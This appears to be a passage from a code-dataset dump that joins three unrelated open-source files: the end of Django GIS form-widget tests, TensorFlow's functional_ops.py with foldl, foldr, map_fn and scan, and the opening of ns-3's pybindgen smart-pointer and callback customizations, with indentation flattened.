"7.27294921875 -2.230224609375,"
"7.657470703125 -1.25244140625))"),
}
def assertMapWidget(self, form_instance):
"""
Make sure the MapWidget js is passed in the form media and a MapWidget
is actually created
"""
self.assertTrue(form_instance.is_valid())
rendered = form_instance.as_p()
self.assertIn('new MapWidget(options);', rendered)
self.assertIn('gis/js/OLMapWidget.js', str(form_instance.media))
def assertTextarea(self, geom, rendered):
"""Makes sure the wkt and a textarea are in the content"""
self.assertIn('<textarea ', rendered)
self.assertIn('required', rendered)
self.assertIn(geom.wkt, rendered)
def test_pointfield(self):
class PointForm(forms.Form):
p = forms.PointField()
geom = self.geometries['point']
form = PointForm(data={'p': geom})
self.assertTextarea(geom, form.as_p())
self.assertMapWidget(form)
self.assertFalse(PointForm().is_valid())
invalid = PointForm(data={'p': 'some invalid geom'})
self.assertFalse(invalid.is_valid())
self.assertIn('Invalid geometry value', str(invalid.errors))
for invalid in [geo for key, geo in self.geometries.items() if key != 'point']:
self.assertFalse(PointForm(data={'p': invalid.wkt}).is_valid())
def test_multipointfield(self):
class PointForm(forms.Form):
p = forms.MultiPointField()
geom = self.geometries['multipoint']
form = PointForm(data={'p': geom})
self.assertTextarea(geom, form.as_p())
self.assertMapWidget(form)
self.assertFalse(PointForm().is_valid())
for invalid in [geo for key, geo in self.geometries.items() if key != 'multipoint']:
self.assertFalse(PointForm(data={'p': invalid.wkt}).is_valid())
def test_linestringfield(self):
class LineStringForm(forms.Form):
l = forms.LineStringField()
geom = self.geometries['linestring']
form = LineStringForm(data={'l': geom})
self.assertTextarea(geom, form.as_p())
self.assertMapWidget(form)
self.assertFalse(LineStringForm().is_valid())
for invalid in [geo for key, geo in self.geometries.items() if key != 'linestring']:
self.assertFalse(LineStringForm(data={'p': invalid.wkt}).is_valid())
def test_multilinestringfield(self):
class LineStringForm(forms.Form):
l = forms.MultiLineStringField()
geom = self.geometries['multilinestring']
form = LineStringForm(data={'l': geom})
self.assertTextarea(geom, form.as_p())
self.assertMapWidget(form)
self.assertFalse(LineStringForm().is_valid())
for invalid in [geo for key, geo in self.geometries.items() if key != 'multilinestring']:
self.assertFalse(LineStringForm(data={'p': invalid.wkt}).is_valid())
def test_polygonfield(self):
class PolygonForm(forms.Form):
p = forms.PolygonField()
geom = self.geometries['polygon']
form = PolygonForm(data={'p': geom})
self.assertTextarea(geom, form.as_p())
self.assertMapWidget(form)
self.assertFalse(PolygonForm().is_valid())
for invalid in [geo for key, geo in self.geometries.items() if key != 'polygon']:
self.assertFalse(PolygonForm(data={'p': invalid.wkt}).is_valid())
def test_multipolygonfield(self):
class PolygonForm(forms.Form):
p = forms.MultiPolygonField()
geom = self.geometries['multipolygon']
form = PolygonForm(data={'p': geom})
self.assertTextarea(geom, form.as_p())
self.assertMapWidget(form)
self.assertFalse(PolygonForm().is_valid())
for invalid in [geo for key, geo in self.geometries.items() if key != 'multipolygon']:
self.assertFalse(PolygonForm(data={'p': invalid.wkt}).is_valid())
def test_geometrycollectionfield(self):
class GeometryForm(forms.Form):
g = forms.GeometryCollectionField()
geom = self.geometries['geometrycollection']
form = GeometryForm(data={'g': geom})
self.assertTextarea(geom, form.as_p())
self.assertMapWidget(form)
self.assertFalse(GeometryForm().is_valid())
for invalid in [geo for key, geo in self.geometries.items() if key != 'geometrycollection']:
self.assertFalse(GeometryForm(data={'g': invalid.wkt}).is_valid())
@skipUnless(HAS_GDAL, "OSMWidgetTest needs GDAL support")
@skipUnlessDBFeature("gis_enabled")
class OSMWidgetTest(SimpleTestCase):
def setUp(self):
self.geometries = {
'point': GEOSGeometry("SRID=4326;POINT(9.052734375 42.451171875)"),
}
def test_osm_widget(self):
class PointForm(forms.Form):
p = forms.PointField(widget=forms.OSMWidget)
geom = self.geometries['point']
form = PointForm(data={'p': geom})
rendered = form.as_p()
self.assertIn("OpenStreetMap (Mapnik)", rendered)
self.assertIn("id: 'id_p',", rendered)
def test_default_lat_lon(self):
class PointForm(forms.Form):
p = forms.PointField(
widget=forms.OSMWidget(attrs={
'default_lon': 20, 'default_lat': 30
}),
)
form = PointForm()
rendered = form.as_p()
self.assertIn("options['default_lon'] = 20;", rendered)
self.assertIn("options['default_lat'] = 30;", rendered)
if forms.OSMWidget.default_lon != 20:
self.assertNotIn(
"options['default_lon'] = %d;" % forms.OSMWidget.default_lon,
rendered)
if forms.OSMWidget.default_lat != 30:
self.assertNotIn(
"options['default_lat'] = %d;" % forms.OSMWidget.default_lat,
rendered)
@skipUnless(HAS_GDAL, "CustomGeometryWidgetTest needs GDAL support")
@skipUnlessDBFeature("gis_enabled")
class CustomGeometryWidgetTest(SimpleTestCase):
def test_custom_serialization_widget(self):
class CustomGeometryWidget(forms.BaseGeometryWidget):
template_name = 'gis/openlayers.html'
deserialize_called = 0
def serialize(self, value):
return value.json if value else ''
def deserialize(self, value):
self.deserialize_called += 1
return GEOSGeometry(value)
class PointForm(forms.Form):
p = forms.PointField(widget=CustomGeometryWidget)
point = GEOSGeometry("SRID=4326;POINT(9.052734375 42.451171875)")
form = PointForm(data={'p': point})
self.assertIn(escape(point.json), form.as_p())
CustomGeometryWidget.called = 0
widget = form.fields['p'].widget
# Force deserialize use due to a string value
self.assertIn(escape(point.json), widget.render('p', point.json))
self.assertEqual(widget.deserialize_called, 1)
form = PointForm(data={'p': point.json})
self.assertTrue(form.is_valid())
# Ensure that resulting geometry has srid set
self.assertEqual(form.cleaned_data['p'].srid, 4326)
| bsd-3-clause |
nightjean/Deep-Learning | tensorflow/python/ops/functional_ops.py | 74 | 23664 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Functional operations.
See the @{$python/functional_ops} guide.
@@map_fn
@@foldl
@@foldr
@@scan
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope as vs
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_functional_ops import *
# pylint: enable=wildcard-import
# pylint: disable=unused-import
from tensorflow.python.ops.gen_functional_ops import _symbolic_gradient
# pylint: enable=unused-import
from tensorflow.python.util import nest
# TODO(yuanbyu, mrry): Handle stride to support sliding windows.
def foldl(fn, elems, initializer=None, parallel_iterations=10, back_prop=True,
swap_memory=False, name=None):
"""foldl on the list of tensors unpacked from `elems` on dimension 0.
This foldl operator repeatedly applies the callable `fn` to a sequence
of elements from first to last. The elements are made of the tensors
unpacked from `elems` on dimension 0. The callable fn takes two tensors as
arguments. The first argument is the accumulated value computed from the
preceding invocation of fn. If `initializer` is None, `elems` must contain
at least one element, and its first element is used as the initializer.
Suppose that `elems` is unpacked into `values`, a list of tensors. The shape
of the result tensor is fn(initializer, values[0]).shape`.
Args:
fn: The callable to be performed.
elems: A tensor to be unpacked on dimension 0.
initializer: (optional) The initial value for the accumulator.
parallel_iterations: (optional) The number of iterations allowed to run
in parallel.
back_prop: (optional) True enables support for back propagation.
swap_memory: (optional) True enables GPU-CPU memory swapping.
name: (optional) Name prefix for the returned tensors.
Returns:
A tensor resulting from applying `fn` consecutively to the list of tensors
unpacked from `elems`, from first to last.
Raises:
TypeError: if `fn` is not callable.
Example:
```python
elems = [1, 2, 3, 4, 5, 6]
sum = foldl(lambda a, x: a + x, elems)
# sum == 21
```
"""
if not callable(fn):
raise TypeError("fn must be callable.")
with ops.name_scope(name, "foldl", [elems]):
# Any get_variable calls in fn will cache the first call locally
# and not issue repeated network I/O requests for each iteration.
varscope = vs.get_variable_scope()
varscope_caching_device_was_none = False
if varscope.caching_device is None:
# TODO(ebrevdo): Change to using colocate_with here and in other methods.
varscope.set_caching_device(lambda op: op.device)
varscope_caching_device_was_none = True
# Convert elems to tensor array.
elems = ops.convert_to_tensor(elems, name="elems")
n = array_ops.shape(elems)[0]
elems_ta = tensor_array_ops.TensorArray(dtype=elems.dtype, size=n,
dynamic_size=False,
infer_shape=True)
elems_ta = elems_ta.unstack(elems)
if initializer is None:
a = elems_ta.read(0)
i = constant_op.constant(1)
else:
a = ops.convert_to_tensor(initializer)
i = constant_op.constant(0)
def compute(i, a):
a = fn(a, elems_ta.read(i))
return [i + 1, a]
_, r_a = control_flow_ops.while_loop(
lambda i, a: i < n, compute, [i, a],
parallel_iterations=parallel_iterations,
back_prop=back_prop,
swap_memory=swap_memory)
if varscope_caching_device_was_none:
varscope.set_caching_device(None)
return r_a
def foldr(fn, elems, initializer=None, parallel_iterations=10, back_prop=True,
swap_memory=False, name=None):
"""foldr on the list of tensors unpacked from `elems` on dimension 0.
This foldr operator repeatedly applies the callable `fn` to a sequence
of elements from last to first. The elements are made of the tensors
unpacked from `elems`. The callable fn takes two tensors as arguments.
The first argument is the accumulated value computed from the preceding
invocation of fn. If `initializer` is None, `elems` must contain at least
one element, and its first element is used as the initializer.
Suppose that `elems` is unpacked into `values`, a list of tensors. The shape
of the result tensor is `fn(initializer, values[0]).shape`.
Args:
fn: The callable to be performed.
elems: A tensor that is unpacked into a sequence of tensors to apply `fn`.
initializer: (optional) The initial value for the accumulator.
parallel_iterations: (optional) The number of iterations allowed to run
in parallel.
back_prop: (optional) True enables support for back propagation.
swap_memory: (optional) True enables GPU-CPU memory swapping.
name: (optional) Name prefix for the returned tensors.
Returns:
A tensor resulting from applying `fn` consecutively to the list of tensors
unpacked from `elems`, from last to first.
Raises:
TypeError: if `fn` is not callable.
Example:
```python
elems = [1, 2, 3, 4, 5, 6]
sum = foldr(lambda a, x: a + x, elems)
# sum == 21
```
"""
if not callable(fn):
raise TypeError("fn must be callable.")
with ops.name_scope(name, "foldr", [elems]):
# Any get_variable calls in fn will cache the first call locally
# and not issue repeated network I/O requests for each iteration.
varscope = vs.get_variable_scope()
varscope_caching_device_was_none = False
if varscope.caching_device is None:
# TODO(ebrevdo): Change to using colocate_with here and in other methods.
varscope.set_caching_device(lambda op: op.device)
varscope_caching_device_was_none = True
# Convert elems to tensor array.
elems = ops.convert_to_tensor(elems, name="elems")
n = array_ops.shape(elems)[0]
elems_ta = tensor_array_ops.TensorArray(dtype=elems.dtype, size=n,
dynamic_size=False,
infer_shape=True)
elems_ta = elems_ta.unstack(elems)
if initializer is None:
i = n - 1
a = elems_ta.read(i)
else:
i = n
a = ops.convert_to_tensor(initializer)
def compute(i, a):
i -= 1
a = fn(a, elems_ta.read(i))
return [i, a]
_, r_a = control_flow_ops.while_loop(
lambda i, a: i > 0, compute, [i, a],
parallel_iterations=parallel_iterations,
back_prop=back_prop,
swap_memory=swap_memory)
if varscope_caching_device_was_none:
varscope.set_caching_device(None)
return r_a
def map_fn(fn, elems, dtype=None, parallel_iterations=10, back_prop=True,
swap_memory=False, infer_shape=True, name=None):
"""map on the list of tensors unpacked from `elems` on dimension 0.
The simplest version of `map_fn` repeatedly applies the callable `fn` to a
sequence of elements from first to last. The elements are made of the
tensors unpacked from `elems`. `dtype` is the data type of the return
value of `fn`. Users must provide `dtype` if it is different from
the data type of `elems`.
Suppose that `elems` is unpacked into `values`, a list of tensors. The shape
of the result tensor is `[values.shape[0]] + fn(values[0]).shape`.
This method also allows multi-arity `elems` and output of `fn`. If `elems`
is a (possibly nested) list or tuple of tensors, then each of these tensors
must have a matching first (unpack) dimension. The signature of `fn` may
match the structure of `elems`. That is, if `elems` is
`(t1, [t2, t3, [t4, t5]])`, then an appropriate signature for `fn` is:
`fn = lambda (t1, [t2, t3, [t4, t5]]):`.
Furthermore, `fn` may emit a different structure than its input. For example,
`fn` may look like: `fn = lambda t1: return (t1 + 1, t1 - 1)`. In this case,
the `dtype` parameter is not optional: `dtype` must be a type or (possibly
nested) tuple of types matching the output of `fn`.
To apply a functional operation to the nonzero elements of a SparseTensor
one of the following methods is recommended. First, if the function is
expressible as TensorFlow ops, use
```python
result = SparseTensor(input.indices, fn(input.values), input.dense_shape)
```
If, however, the function is not expressible as a TensorFlow op, then use
```python
result = SparseTensor(
input.indices, map_fn(fn, input.values), input.dense_shape)
```
instead.
Args:
fn: The callable to be performed. It accepts one argument, which will
have the same (possibly nested) structure as `elems`. Its output
must have the same structure as `dtype` if one is provided, otherwise
it must have the same structure as `elems`.
elems: A tensor or (possibly nested) sequence of tensors, each of which
will be unpacked along their first dimension. The nested sequence
of the resulting slices will be applied to `fn`.
dtype: (optional) The output type(s) of `fn`. If `fn` returns a structure
of Tensors differing from the structure of `elems`, then `dtype` is not
optional and must have the same structure as the output of `fn`.
parallel_iterations: (optional) The number of iterations allowed to run
in parallel.
back_prop: (optional) True enables support for back propagation.
swap_memory: (optional) True enables GPU-CPU memory swapping.
infer_shape: (optional) False disables tests for consistent output shapes.
name: (optional) Name prefix for the returned tensors.
Returns:
A tensor or (possibly nested) sequence of tensors. Each tensor packs the
results of applying `fn` to tensors unpacked from `elems` along the first
dimension, from first to last.
Raises:
TypeError: if `fn` is not callable or the structure of the output of
`fn` and `dtype` do not match, or if elems is a SparseTensor.
ValueError: if the lengths of the output of `fn` and `dtype` do not match.
Examples:
```python
elems = np.array([1, 2, 3, 4, 5, 6])
squares = map_fn(lambda x: x * x, elems)
# squares == [1, 4, 9, 16, 25, 36]
```
```python
elems = (np.array([1, 2, 3]), np.array([-1, 1, -1]))
alternate = map_fn(lambda x: x[0] * x[1], elems, dtype=tf.int64)
# alternate == [-1, 2, -3]
```
```python
elems = np.array([1, 2, 3])
alternates = map_fn(lambda x: (x, -x), elems, dtype=(tf.int64, tf.int64))
# alternates[0] == [1, 2, 3]
# alternates[1] == [-1, -2, -3]
```
"""
if not callable(fn):
raise TypeError("fn must be callable.")
if isinstance(elems, sparse_tensor.SparseTensor):
raise TypeError(
"To perform a map on the values of a sparse tensor use either "
" SparseTensor(input.indices, fn(input.values), input.dense_shape) or "
" SparseTensor(input.indices, map_fn(fn, input.values), "
"input.dense_shape)")
input_is_sequence = nest.is_sequence(elems)
input_flatten = lambda x: nest.flatten(x) if input_is_sequence else [x]
def input_pack(x):
return nest.pack_sequence_as(elems, x) if input_is_sequence else x[0]
if dtype is None:
output_is_sequence = input_is_sequence
output_flatten = input_flatten
output_pack = input_pack
else:
output_is_sequence = nest.is_sequence(dtype)
output_flatten = lambda x: nest.flatten(x) if output_is_sequence else [x]
def output_pack(x):
return (nest.pack_sequence_as(dtype, x)
if output_is_sequence else x[0])
elems_flat = input_flatten(elems)
with ops.name_scope(name, "map", elems_flat):
# Any get_variable calls in fn will cache the first call locally
# and not issue repeated network I/O requests for each iteration.
varscope = vs.get_variable_scope()
varscope_caching_device_was_none = False
if varscope.caching_device is None:
# TODO(ebrevdo): Change to using colocate_with here and in other methods.
varscope.set_caching_device(lambda op: op.device)
varscope_caching_device_was_none = True
elems_flat = [
ops.convert_to_tensor(elem, name="elem") for elem in elems_flat]
dtype = dtype or input_pack([elem.dtype for elem in elems_flat])
dtype_flat = output_flatten(dtype)
# Convert elems to tensor array.
n = array_ops.shape(elems_flat[0])[0]
# TensorArrays are always flat
elems_ta = [
tensor_array_ops.TensorArray(dtype=elem.dtype, size=n,
dynamic_size=False,
infer_shape=True)
for elem in elems_flat]
# Unpack elements
elems_ta = [
elem_ta.unstack(elem) for elem_ta, elem in zip(elems_ta, elems_flat)]
i = constant_op.constant(0)
accs_ta = [
tensor_array_ops.TensorArray(dtype=dt, size=n,
dynamic_size=False,
infer_shape=infer_shape)
for dt in dtype_flat]
def compute(i, tas):
"""The loop body of map_fn.
Args:
i: the loop counter
tas: the flat TensorArray accumulator list
Returns:
(i + 1, tas): the updated counter + updated TensorArrays
Raises:
TypeError: if dtype and packed_fn_values structure do not match
ValueType: if dtype and packed_fn_values lengths do not match
"""
packed_values = input_pack([elem_ta.read(i) for elem_ta in elems_ta])
packed_fn_values = fn(packed_values)
nest.assert_same_structure(dtype or elems, packed_fn_values)
flat_fn_values = output_flatten(packed_fn_values)
tas = [ta.write(i, value) for (ta, value) in zip(tas, flat_fn_values)]
return (i + 1, tas)
_, r_a = control_flow_ops.while_loop(
lambda i, _: i < n, compute, (i, accs_ta),
parallel_iterations=parallel_iterations,
back_prop=back_prop,
swap_memory=swap_memory)
results_flat = [r.stack() for r in r_a]
n_static = elems_flat[0].get_shape().with_rank_at_least(1)[0]
for elem in elems_flat[1:]:
n_static.merge_with(elem.get_shape().with_rank_at_least(1)[0])
for r in results_flat:
r.set_shape(tensor_shape.TensorShape(n_static).concatenate(
r.get_shape()[1:]))
if varscope_caching_device_was_none:
varscope.set_caching_device(None)
return output_pack(results_flat)
def scan(fn, elems, initializer=None, parallel_iterations=10, back_prop=True,
swap_memory=False, infer_shape=True, name=None):
"""scan on the list of tensors unpacked from `elems` on dimension 0.
The simplest version of `scan` repeatedly applies the callable `fn` to a
sequence of elements from first to last. The elements are made of the tensors
unpacked from `elems` on dimension 0. The callable fn takes two tensors as
arguments. The first argument is the accumulated value computed from the
preceding invocation of fn. If `initializer` is None, `elems` must contain
at least one element, and its first element is used as the initializer.
Suppose that `elems` is unpacked into `values`, a list of tensors. The shape
of the result tensor is `[len(values)] + fn(initializer, values[0]).shape`.
This method also allows multi-arity `elems` and accumulator. If `elems`
is a (possibly nested) list or tuple of tensors, then each of these tensors
must have a matching first (unpack) dimension. The second argument of
`fn` must match the structure of `elems`.
If no `initializer` is provided, the output structure and dtypes of `fn`
are assumed to be the same as its input; and in this case, the first
argument of `fn` must match the structure of `elems`.
If an `initializer` is provided, then the output of `fn` must have the same
structure as `initializer`; and the first argument of `fn` must match
this structure.
For example, if `elems` is `(t1, [t2, t3])` and `initializer` is
`[i1, i2]` then an appropriate signature for `fn` in `python2` is:
`fn = lambda (acc_p1, acc_p2), (t1 [t2, t3]):` and `fn` must return a list,
`[acc_n1, acc_n2]`. An alternative correct signature for `fn`, and the
one that works in `python3`, is:
`fn = lambda a, t:`, where `a` and `t` correspond to the input tuples.
Args:
fn: The callable to be performed. It accepts two arguments. The first
will have the same structure as `initializer` if one is provided,
otherwise it will have the same structure as `elems`. The second
will have the same (possibly nested) structure as `elems`. Its output
must have the same structure as `initializer` if one is provided,
otherwise it must have the same structure as `elems`.
elems: A tensor or (possibly nested) sequence of tensors, each of which
will be unpacked along their first dimension. The nested sequence
of the resulting slices will be the first argument to `fn`.
initializer: (optional) A tensor or (possibly nested) sequence of tensors,
initial value for the accumulator, and the expected output type of `fn`.
parallel_iterations: (optional) The number of iterations allowed to run
in parallel.
back_prop: (optional) True enables support for back propagation.
swap_memory: (optional) True enables GPU-CPU memory swapping.
infer_shape: (optional) False disables tests for consistent output shapes.
name: (optional) Name prefix for the returned tensors.
Returns:
A tensor or (possibly nested) sequence of tensors. Each tensor packs the
results of applying `fn` to tensors unpacked from `elems` along the first
dimension, and the previous accumulator value(s), from first to last.
Raises:
TypeError: if `fn` is not callable or the structure of the output of
`fn` and `initializer` do not match.
ValueError: if the lengths of the output of `fn` and `initializer`
do not match.
Examples:
```python
elems = np.array([1, 2, 3, 4, 5, 6])
sum = scan(lambda a, x: a + x, elems)
# sum == [1, 3, 6, 10, 15, 21]
```
```python
elems = np.array([1, 2, 3, 4, 5, 6])
initializer = np.array(0)
sum_one = scan(
lambda a, x: x[0] - x[1] + a, (elems + 1, elems), initializer)
# sum_one == [1, 2, 3, 4, 5, 6]
```
```python
elems = np.array([1, 0, 0, 0, 0, 0])
initializer = (np.array(0), np.array(1))
fibonaccis = scan(lambda a, _: (a[1], a[0] + a[1]), elems, initializer)
# fibonaccis == ([1, 1, 2, 3, 5, 8], [1, 2, 3, 5, 8, 13])
```
"""
if not callable(fn):
raise TypeError("fn must be callable.")
input_is_sequence = nest.is_sequence(elems)
input_flatten = lambda x: nest.flatten(x) if input_is_sequence else [x]
def input_pack(x):
return nest.pack_sequence_as(elems, x) if input_is_sequence else x[0]
if initializer is None:
output_is_sequence = input_is_sequence
output_flatten = input_flatten
output_pack = input_pack
else:
output_is_sequence = nest.is_sequence(initializer)
output_flatten = lambda x: nest.flatten(x) if output_is_sequence else [x]
def output_pack(x):
return (nest.pack_sequence_as(initializer, x)
if output_is_sequence else x[0])
elems_flat = input_flatten(elems)
with ops.name_scope(name, "scan", elems_flat):
# Any get_variable calls in fn will cache the first call locally
# and not issue repeated network I/O requests for each iteration.
varscope = vs.get_variable_scope()
varscope_caching_device_was_none = False
if varscope.caching_device is None:
# TODO(ebrevdo): Change to using colocate_with here and in other methods.
varscope.set_caching_device(lambda op: op.device)
varscope_caching_device_was_none = True
# Convert elems to tensor array.
elems_flat = [
ops.convert_to_tensor(elem, name="elem") for elem in elems_flat]
n = array_ops.shape(elems_flat[0])[0]
# TensorArrays are always flat
elems_ta = [
tensor_array_ops.TensorArray(dtype=elem.dtype, size=n,
dynamic_size=False,
infer_shape=True)
for elem in elems_flat]
# Unpack elements
elems_ta = [
elem_ta.unstack(elem) for elem_ta, elem in zip(elems_ta, elems_flat)]
if initializer is None:
a_flat = [elem.read(0) for elem in elems_ta]
i = constant_op.constant(1)
else:
initializer_flat = output_flatten(initializer)
a_flat = [ops.convert_to_tensor(init) for init in initializer_flat]
i = constant_op.constant(0)
# Create a tensor array to store the intermediate values.
accs_ta = [
tensor_array_ops.TensorArray(dtype=init.dtype, size=n,
dynamic_size=False,
infer_shape=infer_shape)
for init in a_flat]
if initializer is None:
accs_ta = [acc_ta.write(0, a) for (acc_ta, a) in zip(accs_ta, a_flat)]
def compute(i, a_flat, tas):
"""The loop body of scan.
Args:
i: the loop counter.
a_flat: the accumulator value(s), flattened.
tas: the output accumulator TensorArray(s), flattened.
Returns:
[i + 1, a_flat, tas]: the updated counter + new accumulator values +
updated TensorArrays
Raises:
TypeError: if initializer and fn() output structure do not match
ValueType: if initializer and fn() output lengths do not match
"""
packed_elems = input_pack([elem_ta.read(i) for elem_ta in elems_ta])
packed_a = output_pack(a_flat)
a_out = fn(packed_a, packed_elems)
nest.assert_same_structure(
elems if initializer is None else initializer, a_out)
flat_a_out = output_flatten(a_out)
tas = [ta.write(i, value) for (ta, value) in zip(tas, flat_a_out)]
return (i + 1, flat_a_out, tas)
_, _, r_a = control_flow_ops.while_loop(
lambda i, _1, _2: i < n, compute, (i, a_flat, accs_ta),
parallel_iterations=parallel_iterations,
back_prop=back_prop, swap_memory=swap_memory)
results_flat = [r.stack() for r in r_a]
n_static = elems_flat[0].get_shape().with_rank_at_least(1)[0]
for elem in elems_flat[1:]:
n_static.merge_with(elem.get_shape().with_rank_at_least(1)[0])
for r in results_flat:
r.set_shape(tensor_shape.TensorShape(n_static).concatenate(
r.get_shape()[1:]))
if varscope_caching_device_was_none:
varscope.set_caching_device(None)
return output_pack(results_flat)
| apache-2.0 |
tomhenderson/ns-3-dev-testing | bindings/python/ns3modulegen_core_customizations.py | 41 | 18881 | from __future__ import print_function
import sys
import re
from pybindgen.typehandlers import base as typehandlers
from pybindgen import ReturnValue, Parameter
from pybindgen.cppmethod import CustomCppMethodWrapper, CustomCppConstructorWrapper
from pybindgen.typehandlers.codesink import MemoryCodeSink
from pybindgen.typehandlers import ctypeparser
from pybindgen.typehandlers.base import ForwardWrapperBase
from pybindgen import cppclass
import warnings
from pybindgen.typehandlers.base import CodeGenerationError
import sys
class SmartPointerTransformation(typehandlers.TypeTransformation):
"""
This class provides a "type transformation" that tends to support
NS-3 smart pointers. Parameters such as "Ptr<Foo> foo" are
transformed into something like Parameter.new("Foo*", "foo",
transfer_ownership=False). Return values such as Ptr<Foo> are
transformed into ReturnValue.new("Foo*",
caller_owns_return=False). Since the underlying objects have
reference counting, PyBindGen does the right thing.
"""
def __init__(self):
super(SmartPointerTransformation, self).__init__()
self.rx = re.compile(r'(ns3::|::ns3::|)Ptr<([^>]+)>\s*$')
print("{0!r}".format(self), file=sys.stderr)
def _get_untransformed_type_traits(self, name):
m = self.rx.match(name)
is_const = False
if m is None:
print("{0!r} did not match".format(name), file=sys.stderr)
return None, False
else:
name1 = m.group(2).strip()
if name1.startswith('const '):
name1 = name1[len('const '):]
is_const = True
if name1.endswith(' const'):
name1 = name1[:-len(' const')]
is_const = True
new_name = name1+' *'
if new_name.startswith('::'):
new_name = new_name[2:]
return new_name, is_const
def get_untransformed_name(self, name):
new_name, dummy_is_const = self._get_untransformed_type_traits(name)
return new_name
def create_type_handler(self, type_handler, *args, **kwargs):
if issubclass(type_handler, Parameter):
kwargs['transfer_ownership'] = False
elif issubclass(type_handler, ReturnValue):
kwargs['caller_owns_return'] = False
else:
raise AssertionError
## fix the ctype, add ns3:: namespace
orig_ctype, is_const = self._get_untransformed_type_traits(args[0])
if is_const:
correct_ctype = 'ns3::Ptr< {0} const >'.format(orig_ctype[:-2])
else:
correct_ctype = 'ns3::Ptr< {0} >'.format(orig_ctype[:-2])
args = tuple([correct_ctype] + list(args[1:]))
handler = type_handler(*args, **kwargs)
handler.set_tranformation(self, orig_ctype)
return handler
def untransform(self, type_handler, declarations, code_block, expression):
return 'const_cast<%s> (ns3::PeekPointer (%s))' % (type_handler.untransformed_ctype, expression)
def transform(self, type_handler, declarations, code_block, expression):
assert type_handler.untransformed_ctype[-1] == '*'
return 'ns3::Ptr< %s > (%s)' % (type_handler.untransformed_ctype[:-1], expression)
## register the type transformation
transf = SmartPointerTransformation()
typehandlers.return_type_matcher.register_transformation(transf)
typehandlers.param_type_matcher.register_transformation(transf)
del transf
class CallbackImplProxyMethod(typehandlers.ReverseWrapperBase):
"""
Class that generates a proxy virtual method that calls a similarly named python method.
"""
def __init__(self, return_value, parameters):
super(CallbackImplProxyMethod, self).__init__(return_value, parameters)
def generate_python_call(self):
"""code to call the python method"""
build_params = self.build_params.get_parameters(force_tuple_creation=True)
if build_params[0][0] == '"':
build_params[0] = '(char *) ' + build_params[0]
args = self.before_call.declare_variable('PyObject*', 'args')
self.before_call.write_code('%s = Py_BuildValue(%s);'
% (args, ', '.join(build_params)))
self.before_call.add_cleanup_code('Py_DECREF(%s);' % args)
self.before_call.write_code('py_retval = PyObject_CallObject(m_callback, %s);' % args)
self.before_call.write_error_check('py_retval == NULL')
self.before_call.add_cleanup_code('Py_DECREF(py_retval);')
def register_callback_classes(out, callbacks):
for callback_impl_num, template_parameters in enumerate(callbacks):
cls_name = "ns3::Callback< %s >" % ', '.join(template_parameters)
#print >> sys.stderr, "***** trying to register callback: %r" % cls_name
class_name = "PythonCallbackImpl%i" % callback_impl_num
class PythonCallbackParameter(Parameter):
"Class handlers"
CTYPES = [cls_name]
print("***** registering callback handler: %r (%r)" % (ctypeparser.normalize_type_string(cls_name), cls_name), file=sys.stderr)
DIRECTIONS = [Parameter.DIRECTION_IN]
PYTHON_CALLBACK_IMPL_NAME = class_name
TEMPLATE_ARGS = template_parameters
DISABLED = False
def convert_python_to_c(self, wrapper):
"parses python args to get C++ value"
assert isinstance(wrapper, typehandlers.ForwardWrapperBase)
if self.DISABLED:
raise CodeGenerationError("wrapper could not be generated")
if self.default_value is None:
py_callback = wrapper.declarations.declare_variable('PyObject*', self.name)
wrapper.parse_params.add_parameter('O', ['&'+py_callback], self.name)
wrapper.before_call.write_error_check(
'!PyCallable_Check(%s)' % py_callback,
'PyErr_SetString(PyExc_TypeError, "parameter \'%s\' must be callbale");' % self.name)
callback_impl = wrapper.declarations.declare_variable(
'ns3::Ptr<%s>' % self.PYTHON_CALLBACK_IMPL_NAME,
'%s_cb_impl' % self.name)
wrapper.before_call.write_code("%s = ns3::Create<%s> (%s);"
% (callback_impl, self.PYTHON_CALLBACK_IMPL_NAME, py_callback))
wrapper.call_params.append(
'ns3::Callback<%s> (%s)' % (', '.join(self.TEMPLATE_ARGS), callback_impl))
else:
py_callback = wrapper.declarations.declare_variable('PyObject*', self.name, 'NULL')
wrapper.parse_params.add_parameter('O', ['&'+py_callback], self.name, optional=True)
value = wrapper.declarations.declare_variable(
'ns3::Callback<%s>' % ', '.join(self.TEMPLATE_ARGS),
self.name+'_value',
self.default_value)
wrapper.before_call.write_code("if (%s) {" % (py_callback,))
wrapper.before_call.indent()
wrapper.before_call.write_error_check(
'!PyCallable_Check(%s)' % py_callback,
'PyErr_SetString(PyExc_TypeError, "parameter \'%s\' must be callbale");' % self.name)
wrapper.before_call.write_code("%s = ns3::Callback<%s> (ns3::Create<%s> (%s));"
% (value, ', '.join(self.TEMPLATE_ARGS),
self.PYTHON_CALLBACK_IMPL_NAME, py_callback))
wrapper.before_call.unindent()
wrapper.before_call.write_code("}") # closes: if (py_callback) {
wrapper.call_params.append(value)
def convert_c_to_python(self, wrapper):
raise typehandlers.NotSupportedError("Reverse wrappers for ns3::Callback<...> types "
"(python using callbacks defined in C++) not implemented.")
def generate_callback_classes(module, callbacks):
out = module.after_forward_declarations
for callback_impl_num, template_parameters in enumerate(callbacks):
sink = MemoryCodeSink()
cls_name = "ns3::Callback< %s >" % ', '.join(template_parameters)
#print >> sys.stderr, "***** trying to register callback: %r" % cls_name
class_name = "PythonCallbackImpl%i" % callback_impl_num
sink.writeln('''
class %s : public ns3::CallbackImpl<%s>
{
public:
PyObject *m_callback;
%s(PyObject *callback)
{
Py_INCREF(callback);
m_callback = callback;
}
virtual ~%s()
{
PyGILState_STATE __py_gil_state;
__py_gil_state = (PyEval_ThreadsInitialized() ? PyGILState_Ensure() : (PyGILState_STATE) 0);
Py_DECREF(m_callback);
m_callback = NULL;
